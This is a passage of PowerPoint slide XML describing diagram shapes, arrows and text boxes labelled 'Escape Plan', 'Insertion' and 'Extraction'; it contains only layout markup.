            <a:off x="5622170" y="130623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101" name="object 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058170" y="28860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102" name="object 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5905725" y="2602484"/>
            <a:ext cx="0" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="object 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="130623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104" name="object 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058170" y="28860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105" name="object 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6046489" y="1589790"/>
            <a:ext cx="870777" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="439420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="438979" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="object 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="130623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107" name="object 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058170" y="28860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3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="object 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961575" y="1825817"/>
            <a:ext cx="761301" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="166106" marR="10067" indent="-142197">
              <a:lnSpc>
                <a:spcPts val="1784"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pe  Plan</a:t>
            </a:r>
            <a:endParaRPr sz="1585">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="object 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3038789" y="5469419"/>
            <a:ext cx="420288" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="212089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="211568" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="object 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419563" y="5404608"/>
            <a:ext cx="193786" cy="129610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="97789" h="65405">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="64901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97607" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="object 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478368" y="5469419"/>
            <a:ext cx="420288" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="212089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="211568" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="object 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5859142" y="5404608"/>
            <a:ext cx="193786" cy="129610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="97789" h="65405">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="64901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97607" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="object 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1649524" y="3714180"/>
            <a:ext cx="1253315" cy="259174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1684" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="1684">
              <a:latin typeface="Lucida Sans Typewriter"/>
              <a:cs typeface="Lucida Sans Typewriter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="object 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6529696" y="3714180"/>
            <a:ext cx="1387959" cy="259174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1684" b="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>Extractio</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1684" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="1684">
              <a:latin typeface="Lucida Sans Typewriter"/>
              <a:cs typeface="Lucida Sans Typewriter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="object 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3325888" y="2886037"/>
            <a:ext cx="0" cy="431612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="217805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="217190"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14820">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="object 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3325382" y="3316432"/>
            <a:ext cx="16359" cy="15100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8255" h="7619">
                <a:moveTo>
                  <a:pt x="7665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4088" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="object 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277245" y="3316432"/>
            <a:ext cx="1048204" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="528955">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="528921" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="object 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2262053" y="3302256"/>
            <a:ext cx="16359" cy="15100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8255" h="7619">
                <a:moveTo>
                  <a:pt x="7665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3577" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="object 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2276736" y="3316432"/>
            <a:ext cx="0" cy="226503"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="114300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="113960"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14820">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="object 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2212431" y="3502770"/>
            <a:ext cx="129610" cy="195044"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="65405" h="98425">
                <a:moveTo>
                  <a:pt x="64901" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32706" y="98118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64901" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="object 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411391" y="3028828"/>
            <a:ext cx="0" cy="288162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="145414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="145134"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="object 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397212" y="3316432"/>
            <a:ext cx="15100" cy="15100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7620" h="7619">
                <a:moveTo>
                  <a:pt x="7154" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="object 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411392" y="3316432"/>
            <a:ext cx="867002" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="437515">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="436935" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="object 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277244" y="3302256"/>
            <a:ext cx="15100" cy="15100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7619" h="7619">
                <a:moveTo>
                  <a:pt x="4088" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4088" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="object 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2276736" y="3316432"/>
            <a:ext cx="0" cy="226503"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="114300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="113960"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14820">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="object 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2212431" y="3502770"/>
            <a:ext cx="129610" cy="195044"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="65405" h="98425">
                <a:moveTo>
                  <a:pt x="64901" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32706" y="98118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64901" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="object 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320789" y="4033420"/>
            <a:ext cx="0" cy="420288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
